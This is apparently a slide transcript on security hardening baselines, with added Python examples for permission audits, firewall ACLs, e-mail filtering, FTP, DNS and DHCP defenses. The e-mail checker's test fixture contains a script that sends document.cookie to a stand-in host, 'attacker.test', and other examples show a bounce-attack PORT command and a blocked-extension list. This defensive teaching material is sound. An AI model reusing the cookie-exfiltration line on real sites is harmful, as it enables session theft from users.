SECURITY BASELINES - Sangita Prabhu

Posted 12-Jan-2016

TRANSCRIPT

Page 1: SECURITY BASELINES

SECURITY BASELINES

-Sangita Prabhu

Page 2

Overview

- OS/NOS vulnerabilities and hardening practices
- Operation and security of file systems
- Common network hardening practices
- Best practices in securing web services

Page 3

OS/NOS Hardening

Making the operating system (or network operating system) more resistant to outside threats.

Disrupting actions fall into three categories:
- Attacks
- Malfunctions
- Errors

Page 4

Best Practices for System Hardening

- Remove unused applications and services
- Enforce strong password policies
- Keep the number of administrators small
- Enable account lockout
- Apply the latest security updates and hot fixes
- Keep logs on an external (remote) log host
- Back up periodically

Page 5

File System Hardening

- Configuring access controls: setting privileges on files and data objects
- Creating user groups: grouping users by common needs
- File encryption: available on many file systems, but a resource-consuming feature

Page 6

Configuring Access Controls

Common practices for setting file and data privileges:
- Do not leave executables writable by anyone other than their owner, and do not grant execute permission more widely than needed
- Restrict access to important files
- Pay close attention to access-control inheritance (the permissions a file picks up from its parent directory)
- Make log files append-only where the file system offers that option
- Prevent users from installing, removing or editing scripts
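The practices above can be checked mechanically. The script below, an added example that is not part of the original slides, walks a directory tree and reports files that break them, then clears exactly the offending permission bits. The layout it assumes (bin/, scripts/, etc/, log/) and the rule tied to each directory are assumptions for illustration; the checks are plain mode-bit tests with os.stat, so it runs as an unprivileged user on any POSIX system. Append-only attributes (chattr +a on ext file systems) are file-system specific and are not checked here.

```python
"""Audit and remediate file privileges against the practices above.

Added example, not from the original slides. The directory layout
(bin/, scripts/, etc/, log/) and the rules tied to it are assumptions for
illustration; checks are plain mode-bit tests, so the script runs as an
unprivileged user on any POSIX system.
"""
import os
import stat
import tempfile

# Which bits each finding should have cleared.
FIX_MASK = {
    "executable writable by group/other": stat.S_IWGRP | stat.S_IWOTH,
    "script writable by others": stat.S_IWOTH,
    "sensitive file world-readable": stat.S_IROTH,
    "log file world-writable": stat.S_IWOTH,
}


def audit_tree(root):
    """Return sorted (relative_path, finding) pairs for files that violate
    the rules; an empty list means the tree is clean."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # the link target is audited on its own entry
            rel = os.path.relpath(path, root)
            top = rel.split(os.sep, 1)[0]
            mode = st.st_mode
            executable = bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
            # Executables must be writable only by their owner.
            if executable and mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((rel, "executable writable by group/other"))
            # Users must not be able to edit scripts in the scripts area.
            if top == "scripts" and mode & stat.S_IWOTH:
                findings.append((rel, "script writable by others"))
            # Important files (here: anything under etc/) must not be world-readable.
            if top == "etc" and mode & stat.S_IROTH:
                findings.append((rel, "sensitive file world-readable"))
            # Logs are written by the logger only; world-writable logs can be tampered with.
            if top == "log" and mode & stat.S_IWOTH:
                findings.append((rel, "log file world-writable"))
    return sorted(findings)


def remediate(root, findings):
    """Clear exactly the offending bits for each finding; returns the count."""
    for rel, finding in findings:
        path = os.path.join(root, rel)
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, mode & ~FIX_MASK[finding])
    return len(findings)


def build_sample_tree():
    """Construct a throwaway tree with one good file and four bad ones."""
    root = tempfile.mkdtemp(prefix="acl-audit-")
    layout = {
        "bin/httpd": 0o755,          # correct: owner-writable only
        "bin/backup.sh": 0o777,      # executable writable by everyone
        "scripts/rotate.py": 0o775,  # executable writable by group
        "etc/db.conf": 0o644,        # credentials readable by everyone
        "log/auth.log": 0o666,       # log writable by everyone
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    tree = build_sample_tree()
    found = audit_tree(tree)
    for rel, finding in found:
        print(f"{rel}: {finding}")
    remediate(tree, found)
    print("after remediation:", audit_tree(tree))
```

Running it on the constructed tree reports four findings and none after remediation. In production the same audit is worth scheduling, since a package upgrade or a careless chmod can silently reintroduce a world-writable executable.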

Page 7

System Updates

- Minimize the gap between the release and the installation of a security patch
- Monitor security-related information
-- Mailing lists, security-related sites, hacker sites
- Evaluate updates for applicability
-- Keep a log (even a paper one) of what was evaluated and decided
- Plan the installation of updates
-- Unsystematic and haphazard updates can introduce new vulnerabilities to the network
- Document the update plan
- Deploy new systems with the latest software

Page 8

Network Hardening

- Firmware updates
- Configuration

Best practices in configuring router and firewall systems:
- Maintain a copy of the current configuration
- Never allow IP-directed broadcasts
- Configure devices with meaningful names
- Always use a description for each interface
- Always specify bandwidth on the interfaces
- Always configure a loopback address

Page 9

Network Hardening

Best practices in configuration, continued:
- Avoid common words in passwords and naming schemes
- Deploy logging throughout the network
- Restrict data traffic to required ports only

Page 10

Access Control Lists

An ACL is an ordered set of statements that controls the flow of packets through a device, based on parameters and information found within the packets.

ACLs implement packet filtering. Packet-filtering rules can be designed on intrinsic information (what is in the packet: protocol, source and destination addresses, ports) and extrinsic information (for example, the interface the packet arrived on).

Page 11

Designing Filtering Rules

Best practices:
- Deny all packets unless explicitly permitted
- Design anti-spoofing rules
- Identify the protocols, ports, and source and destination addresses that need to be serviced on your network
- Organize the ACL rule set by protocol and by port
- Place the "deny all" rule at the end of the rule set
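The following is an added example, not code from the original slides, showing the rule-design practices above as a working first-match filter: anti-spoofing rules first, explicit permits grouped by protocol and port, and a terminal deny-all, plus a small lint that finds rules an earlier rule has already shadowed. The rule format, the interface names "outside" and "inside", and the 10.0.0.0/8 internal range are assumptions for illustration, not any vendor's ACL syntax.

```python
"""First-match packet-filter evaluator built the way the slide recommends.
Added example, not from the original slides; the rule format, interface
names and address ranges are assumptions for illustration."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

INSIDE = ip_network("10.0.0.0/8")   # assumed internal address space


@dataclass(frozen=True)
class Packet:
    iface: str        # interface the packet arrived on (extrinsic information)
    proto: str        # "tcp", "udp" or "icmp" (intrinsic information)
    src: str
    dst: str
    dport: int = 0


@dataclass(frozen=True)
class Rule:
    action: str                   # "permit" or "deny"
    iface: str = "any"
    proto: str = "any"
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    dport: Optional[int] = None   # None matches every port
    name: str = ""

    def matches(self, pkt: Packet) -> bool:
        return (self.iface in ("any", pkt.iface)
                and self.proto in ("any", pkt.proto)
                and ip_address(pkt.src) in ip_network(self.src)
                and ip_address(pkt.dst) in ip_network(self.dst)
                and self.dport in (None, pkt.dport))

    def covers(self, other: "Rule") -> bool:
        """True if every packet matched by `other` is also matched by self."""
        return (self.iface in ("any", other.iface)
                and self.proto in ("any", other.proto)
                and ip_network(self.src).supernet_of(ip_network(other.src))
                and ip_network(self.dst).supernet_of(ip_network(other.dst))
                and self.dport in (None, other.dport))


def evaluate(rules, pkt):
    """Return (action, rule_name) from the first matching rule. A packet that
    matches nothing is still denied: default deny holds even if someone
    forgets the terminal rule."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action, rule.name
    return "deny", "implicit-deny"


def shadowed(rules):
    """Names of rules that can never fire because an earlier rule covers them
    completely; a cheap lint to run before deploying a rule set."""
    return [rule.name for i, rule in enumerate(rules)
            if any(earlier.covers(rule) for earlier in rules[:i])]


# Assumed topology: "outside" faces the Internet, "inside" faces INSIDE.
ACL = [
    Rule("deny", iface="outside", src=str(INSIDE), name="antispoof-inside-src"),
    Rule("deny", iface="outside", src="127.0.0.0/8", name="antispoof-loopback"),
    Rule("permit", iface="outside", proto="tcp", dst="10.1.1.10/32", dport=443, name="web-https"),
    Rule("permit", iface="outside", proto="udp", dst="10.1.1.53/32", dport=53, name="dns"),
    Rule("permit", iface="inside", src=str(INSIDE), name="egress"),
    Rule("deny", name="deny-all"),
]

if __name__ == "__main__":
    samples = [
        Packet("outside", "tcp", "10.5.5.5", "10.1.1.10", 443),     # spoofed inside source
        Packet("outside", "tcp", "203.0.113.7", "10.1.1.10", 443),  # legitimate HTTPS
        Packet("outside", "tcp", "203.0.113.7", "10.1.1.10", 22),   # SSH is not serviced
        Packet("inside", "tcp", "10.2.3.4", "203.0.113.9", 80),     # outbound browsing
    ]
    for pkt in samples:
        print(pkt, "->", evaluate(ACL, pkt))
    print("shadowed rules:", shadowed(ACL))
```

Order matters: if the anti-spoofing denies were placed after the web-https permit, a packet from a forged 10.x source to the web server would be permitted. The `shadowed` lint catches the opposite mistake, a permit added after deny-all that can never take effect.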

Page 12

Enabling and Disabling Services and Protocols

- Running unnecessary services on network devices makes them vulnerable
- Administrators should identify and remove all unnecessary services
- Required services should be evaluated and installed in a manner that lowers the potential risk
- Example: if RPC or SNMP are needed, carry them over a VPN rather than exposing them directly

Page 13

Commonly Exploited Services

Some examples of commonly exploited services on Cisco platforms:

| Service | Description | Default | Note |
| SNMP | Routers can support SNMP remote query and configuration | Enabled | If not in use, explicitly disable it, or restrict access |
| Domain Name Service | Routers can perform DNS name resolution | Enabled | Set the DNS server address explicitly, or disable DNS |
| IP source routing | IP feature that allows packets to specify their own route | Enabled | This rarely used feature can be helpful in attacks; disable it |

Page 14

Application Hardening

Web servers:
- Isolating web servers
- Configuring web servers for access privileges
- Identifying and enabling web-server-specific logging tools
- Considering security implications
- Configuring authentication and encryption

Page 15

Application Hardening, continued

E-mail servers. Threats:
- Attachments with malicious content
- E-mails with abnormal MIME headers
- Scripts embedded in HTML-enabled mail

Defense mechanisms:
- Latest software updates and patches
- E-mail content filtering using e-mail gateway products
- Virus-scanning tools deployed on the server
- Attachment-checking mechanisms
- Removal of HTML active content
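As an added example (not code from the original slides or from any gateway product), the script below applies the attachment-checking and HTML active-content-removal defenses to a message built inline with the standard library's email package. The blocked-extension list, the filename-length limit used as the "abnormal MIME header" test, and the sample message itself are assumptions constructed for illustration.

```python
"""Gateway-style checks for the e-mail threats above: dangerous attachments,
abnormal MIME headers and active content in HTML mail. Added example, not
from the original slides; lists, limits and the sample message are
assumptions for illustration."""
import email
import os
import re
from email import policy
from email.message import EmailMessage

BLOCKED_EXT = {".exe", ".scr", ".js", ".vbs", ".bat", ".cmd", ".ps1", ".hta", ".jar"}
MAX_FILENAME = 255            # assumed limit; longer names are treated as abnormal
SCRIPT_RE = re.compile(r"<script\b.*?</script\s*>", re.I | re.S)
EVENT_ATTR_RE = re.compile(r"""\s+on\w+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.I)


def inspect(raw):
    """Return a list of (finding, detail) pairs for a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        fname = part.get_filename()
        if fname:
            if len(fname) > MAX_FILENAME:
                findings.append(("abnormal-mime-header", "oversized filename"))
            if os.path.splitext(fname)[1].lower() in BLOCKED_EXT:
                findings.append(("blocked-extension", fname))
            payload = part.get_payload(decode=True) or b""
            # Content check that does not trust the declared type or the extension.
            if payload.startswith(b"MZ"):
                findings.append(("executable-magic", fname))
        if ctype == "text/html":
            html = part.get_content()
            if SCRIPT_RE.search(html) or EVENT_ATTR_RE.search(html):
                findings.append(("active-content", ctype))
    return findings


def sanitize_html(html):
    """Strip <script> blocks and on* event handlers (HTML active-content removal)."""
    return EVENT_ATTR_RE.sub("", SCRIPT_RE.sub("", html))


def build_sample_message():
    """Construct a message that trips all three checks; returns raw bytes."""
    msg = EmailMessage()
    msg["From"] = "billing@example.test"
    msg["To"] = "user@example.test"
    msg["Subject"] = "Invoice"
    msg.set_content("Please see the attached invoice.")
    msg.add_alternative(
        '<p>Please see the <a href="#" onclick="steal()">attached</a> invoice.</p>'
        "<script>document.location='http://attacker.test/?c='+document.cookie</script>",
        subtype="html")
    # Declared as PDF, named .exe, and carrying a PE header: three lies at once.
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 60, maintype="application",
                       subtype="pdf", filename="invoice.exe")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in inspect(build_sample_message()):
        print(finding)
```

The magic-byte check is the one that survives renaming: an attacker who ships invoice.pdf with an executable inside defeats the extension list but not the content check. Regex-based HTML sanitizing is shown for brevity; a gateway that renders HTML should use a real HTML parser with an allow-list of tags.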

Page 16

Application Hardening, continued

FTP servers. Protecting against bounce attacks:
-- The attacker uses the FTP server to open connections to the target machine rather than connecting directly (the PORT command lets a client name any address and port as the target of the data connection)
-- This makes the attacker difficult to track
-- Configure servers not to open data connections to TCP ports below 1024
-- Use proper file protections
-- Disable the PORT command; note that this also disables proxy FTP, which might be needed in certain situations

Page 17

FTP Servers, continued

Restricting areas; protecting usernames and passwords:
- Use alternate authentication mechanisms to avoid interception of clear-text passwords
- Limit the number of attempts at a legitimate password
- Limit the number of control connections
- Return the same response to every USER command, prompt for the password, and only then reject the username/password combination, so that valid usernames cannot be enumerated

Port stealing: deploy random port assignments for passive data connections
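The server-side checks from the last two slides, as an added example that is not part of the original slides: PORT-command validation against bounce attacks and privileged ports, a login path whose reply and timing are the same for an unknown user and a wrong password, a per-connection attempt limit, and unpredictable passive-port selection. The peer address, the user store and its hashing, the attempt limit and the passive port range are assumptions for illustration.

```python
"""Server-side FTP checks: bounce attacks via PORT, username enumeration and
brute force on login, and port stealing on passive data connections.
Added example, not from the original slides; peer address, user store,
attempt limit and passive-port range are assumptions for illustration."""
import hashlib
import hmac
import re
import secrets

PORT_RE = re.compile(r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$", re.I)
MAX_ATTEMPTS = 3                 # assumed per-connection limit
PASV_RANGE = (50000, 50999)      # assumed passive port range
DUMMY_SALT = b"\x00" * 16        # used so an unknown user costs the same as a known one


def parse_port_command(line):
    """Decode 'PORT h1,h2,h3,h4,p1,p2' into (host, port); None if malformed."""
    m = PORT_RE.match(line)
    if not m:
        return None
    octets = [int(x) for x in m.groups()]
    if any(o > 255 for o in octets):
        return None
    return ".".join(map(str, octets[:4])), octets[4] * 256 + octets[5]


def check_port_command(line, peer_host):
    """Return (accepted, reply). A bounce attack names a third party as the
    data-connection target; refuse any address other than the control
    connection's peer, and any privileged port (< 1024)."""
    parsed = parse_port_command(line)
    if parsed is None:
        return False, "501 Syntax error in parameters or arguments."
    host, port = parsed
    if host != peer_host:
        return False, "500 Illegal PORT command: address does not match control connection."
    if port < 1024:
        return False, "500 Illegal PORT command: privileged port refused."
    return True, "200 PORT command successful."


def password_hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def login(users, user, password, failures):
    """Return (accepted, reply). `users` maps name -> (salt, hash). The reply
    for an unknown user and for a wrong password is identical, and the
    unknown-user path still does the hash work, so neither the message nor
    the timing reveals whether the username exists."""
    if failures >= MAX_ATTEMPTS:
        return False, "421 Too many failed login attempts; closing control connection."
    salt, expected = users.get(user, (DUMMY_SALT, b"\x00" * 32))
    ok = hmac.compare_digest(password_hash(password, salt), expected) and user in users
    if ok:
        return True, "230 User logged in, proceed."
    return False, "530 Login incorrect."


def choose_passive_port(in_use, port_range=PASV_RANGE):
    """Pick an unpredictable free port for PASV instead of the next sequential
    one, so a local attacker cannot pre-bind the port the server is about to
    announce and steal the data connection."""
    lo, hi = port_range
    free = [p for p in range(lo, hi + 1) if p not in in_use]
    if not free:
        raise RuntimeError("passive port range exhausted")
    return secrets.choice(free)


if __name__ == "__main__":
    salt = secrets.token_bytes(16)
    users = {"alice": (salt, password_hash("correct horse battery", salt))}
    print(check_port_command("PORT 192,168,1,5,195,80", "192.168.1.5"))
    print(check_port_command("PORT 10,0,0,9,0,25", "192.168.1.5"))   # bounce to 10.0.0.9:25
    print(login(users, "alice", "wrong", 0), login(users, "mallory", "wrong", 0))
    print(choose_passive_port({50000, 50001}))
```

Refusing mismatched PORT targets keeps proxy FTP from working too, which is the trade-off the slide notes; if proxy FTP is needed, an allow-list of permitted third-party hosts is the usual compromise.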

Page 18

Application Hardening, continued

DNS servers:
- Inaccurate data on IP address ownership
-- Without accurate ownership data you cannot distinguish innocent users from attackers
- Customer/registry communication: use encrypted communication
- DNS spoofing and cache poisoning
- Out-of-date root.hints files
- Recursive queries (answered for anyone who asks)
- Denial-of-service attacks
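The spoofing and cache-poisoning threat comes down to a resolver accepting a reply it should have discarded. As an added example, not code from the original slides or from any resolver, the block below models the acceptance test a resolver applies: the reply must match the outstanding query on source address, destination port, transaction ID and question, and only records inside the answering server's zone (its "bailiwick") are kept for the cache. Messages are dataclasses built inline rather than parsed from the wire, and the zone, names and addresses are constructed for illustration.

```python
"""Resolver-side acceptance test for a DNS reply.
Added example, not from the original slides; messages, zone and addresses
are constructed for illustration."""
from dataclasses import dataclass, field
import secrets


@dataclass(frozen=True)
class RR:
    name: str
    rtype: str
    data: str


@dataclass
class Query:
    txid: int
    port: int       # resolver's randomized source port
    server: str     # address the query was sent to
    qname: str
    qtype: str


@dataclass
class Reply:
    txid: int
    port: int       # destination port the reply arrived on
    server: str     # source address of the reply
    qname: str
    qtype: str
    answers: list
    additional: list = field(default_factory=list)


def new_query(server, qname, qtype):
    """Randomize both the 16-bit ID and the source port: with only the ID
    random a blind spoofer needs ~65k guesses, with both ~4 billion."""
    return Query(txid=secrets.randbelow(1 << 16),
                 port=1024 + secrets.randbelow(65536 - 1024),
                 server=server, qname=qname.lower().rstrip("."), qtype=qtype)


def in_bailiwick(name, zone):
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


def accept_reply(query, reply, zone):
    """Return (records_to_cache, reason). An empty list with a reason other
    than 'accepted' means the reply was discarded as a probable spoof."""
    if reply.server != query.server:
        return [], "wrong source address"
    if reply.port != query.port:
        return [], "wrong destination port"
    if reply.txid != query.txid:
        return [], "transaction id mismatch"
    if reply.qname.lower().rstrip(".") != query.qname or reply.qtype != query.qtype:
        return [], "question section does not match"
    kept, dropped = [], 0
    for rr in reply.answers + reply.additional:
        # A server for example.com has no authority over, say, bank.test; an
        # A record for it in the additional section is a poisoning attempt.
        if in_bailiwick(rr.name, zone):
            kept.append(rr)
        else:
            dropped += 1
    return kept, f"accepted ({dropped} out-of-bailiwick record(s) dropped)"


if __name__ == "__main__":
    q = new_query("192.0.2.53", "www.example.com", "A")
    genuine = Reply(q.txid, q.port, q.server, "www.example.com", "A",
                    answers=[RR("www.example.com", "A", "192.0.2.80")],
                    additional=[RR("ns1.example.com", "A", "192.0.2.53"),
                                RR("www.bank.test", "A", "203.0.113.66")])
    print(accept_reply(q, genuine, "example.com"))
    spoof = Reply(q.txid ^ 1, q.port, q.server, "www.example.com", "A",
                  answers=[RR("www.example.com", "A", "203.0.113.66")])
    print(accept_reply(q, spoof, "example.com"))
```

The bailiwick rule is what stops the classic poisoning trick of answering a question about your own domain with an unsolicited additional record for somebody else's; the port and ID checks only make blind spoofing expensive, they do not make it impossible, which is why DNSSEC validation is the complete fix.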

Page 19

Application Hardening, continued

NNTP servers (Network News Transfer Protocol):
- Messages are delivered to newsgroups instead of individual users
- A newsgroup acts as storage for related messages
- A news client is used to read messages
- To gain access to new postings, users need to access news servers
- NNTP is designed to store news articles in a central database and let users choose only the items of interest to them

Page 20

NNTP Servers, continued

- Typically, an NNTP server runs as a background process on one host and accepts connections from other hosts
- It has the same kinds of vulnerabilities as any other network service
- Proper authentication, disabling of unneeded services and application of relevant software and OS patches are effective ways to prevent attacks

Page 21

Application Hardening

File and print servers:
- Offer only essential network and OS services on the server
- Configure the server for user authentication
- Configure the server operating system
- Manage logging and other data-collection mechanisms
- Configure the server for file backups

Page 22

Application Hardening, continued

DHCP servers (Dynamic Host Configuration Protocol):
- Assign dynamic IP addresses to devices on the network
- Simplify network administration
- Have no security provisions and are therefore vulnerable to attack

Attacks:
- DHCP is broadcast-based, so an attacker can use a sniffer to collect critical network information (address ranges, gateways, DNS servers)
- An attacker can spoof the official DHCP server: the protocol allows redundant servers, so clients accept an offer from whichever server answers
- An attacker can launch a DoS attack against the DHCP server (for example, by exhausting the address pool)

Page 23

DHCP Servers, continued

Steps to prevent such attacks:
- Use permanent (reserved) address assignments with DHCP
- Allow dynamic addressing but monitor the log files for malicious users
- Force stations with new MAC addresses to register with the DHCP server
- Use intrusion-detection tools
- Keep software and patches current
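The "monitor the log files" and "force new MAC addresses to register" steps above translate into a few checks over DHCP traffic. The block below is an added example, not code from the original slides or from any DHCP server: it runs over a constructed event list of the kind a DHCP-snooping switch or a sniffer on the segment would produce, and flags unauthorized servers, the clients they managed to serve, unregistered clients, and the DISCOVER burst that marks a pool-exhaustion attack. The event format, the authorized-server list, the MAC registry and the window are assumptions for illustration.

```python
"""Monitoring checks for the DHCP threats above over a constructed event
list. Added example, not from the original slides; event format, server
list, MAC registry and thresholds are assumptions for illustration."""

SERVER_MSGS = {"OFFER", "ACK", "NAK"}
CLIENT_MSGS = {"DISCOVER", "REQUEST"}

# Constructed sample: (seconds, message type, server address, client MAC, offered/assigned address)
SAMPLE_EVENTS = [
    (0.0, "DISCOVER", None, "aa:bb:cc:00:00:01", None),
    (0.1, "OFFER", "10.0.0.2", "aa:bb:cc:00:00:01", "10.0.0.50"),    # the real server
    (0.2, "OFFER", "10.0.0.99", "aa:bb:cc:00:00:01", "10.0.0.200"),  # a second, unauthorized server
    (0.3, "REQUEST", None, "aa:bb:cc:00:00:01", "10.0.0.200"),       # client took the rogue offer
    (0.4, "ACK", "10.0.0.99", "aa:bb:cc:00:00:01", "10.0.0.200"),
] + [
    # A burst of DISCOVERs from never-seen MACs: the pool-exhaustion (DoS) pattern
    (5.0 + i * 0.05, "DISCOVER", None, f"de:ad:be:ef:00:{i:02x}", None) for i in range(8)
]
AUTHORIZED_SERVERS = {"10.0.0.2"}
REGISTERED_MACS = {"aa:bb:cc:00:00:01"}


def rogue_servers(events, authorized=AUTHORIZED_SERVERS):
    """Addresses that sent server-side messages without being authorized."""
    return sorted({srv for _, mtype, srv, _, _ in events
                   if mtype in SERVER_MSGS and srv not in authorized})


def clients_served_by_rogues(events, authorized=AUTHORIZED_SERVERS):
    """MAC -> address handed out by a rogue server; these hosts now trust an
    attacker-chosen gateway and DNS server and need to be found and re-leased."""
    return {mac: addr for _, mtype, srv, mac, addr in events
            if mtype == "ACK" and srv not in authorized}


def unregistered_clients(events, registry=REGISTERED_MACS):
    """MACs asking for leases that never registered with the server."""
    return sorted({mac for _, mtype, _, mac, _ in events
                   if mtype in CLIENT_MSGS and mac not in registry})


def peak_discover_rate(events, window=1.0):
    """Largest number of distinct client MACs sending DISCOVER within any
    `window` seconds; a spike far above the segment's normal churn is the
    signature of a pool-exhaustion attack."""
    discovers = sorted((t, mac) for t, mtype, _, mac, _ in events if mtype == "DISCOVER")
    peak, start = 0, 0
    for end in range(len(discovers)):
        while discovers[end][0] - discovers[start][0] > window:
            start += 1
        peak = max(peak, len({mac for _, mac in discovers[start:end + 1]}))
    return peak


if __name__ == "__main__":
    print("rogue servers:", rogue_servers(SAMPLE_EVENTS))
    print("clients on rogue leases:", clients_served_by_rogues(SAMPLE_EVENTS))
    print("unregistered clients:", unregistered_clients(SAMPLE_EVENTS))
    print("peak DISCOVERs per second:", peak_discover_rate(SAMPLE_EVENTS))
```

On a switch that supports DHCP snooping, the rogue-server check is enforced in hardware by marking only the uplink to the real server as trusted; the monitoring above is the fallback for segments where that is not available, and the starvation detector is useful in both cases.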

Page 24

Data Repositories

Directory services: Lightweight Directory Access Protocol (LDAP)
- An LDAP directory is a special kind of database that stores information
- It is based on a simple tree-like hierarchy, called a Directory Information Tree (DIT)
- Threats to LDAP can be categorized in two groups:
-- Directory-service-oriented threats
-- Non-directory-service-oriented threats

Page 25

Directory-Service-Oriented Threats

- Unauthorized access to data
- Unauthorized access to resources
- Unauthorized modification or deletion
- Spoofing of directory services
- Excessive use of resources

Page 26

Non-Directory-Service-Oriented Threats

- Common network-based attacks that compromise the availability of resources
- Attacks against hosts by physically accessing the resources
- Attacks against back-end databases

Page 27

Security of LDAP

Based on two processes:

Authentication
- Anonymous: no specific authentication
- Simple authentication: plaintext passwords
- Simple Authentication and Security Layer (SASL): negotiates a stronger mechanism and can negotiate a protected (integrity- and confidentiality-checked) exchange; the most secure of the three, especially when combined with TLS

Authorization
- What resources, applications and services are accessible to an authenticated client

Page 28

Databases

General principles of security: authentication of users and applications
- Ensure use by legitimate users only
- Determine access privileges
- Applications require a username/password to use the database

Administrative policies and procedures:
- Written security policy
- Initial configuration
- Auditing
- Backup and recovery procedures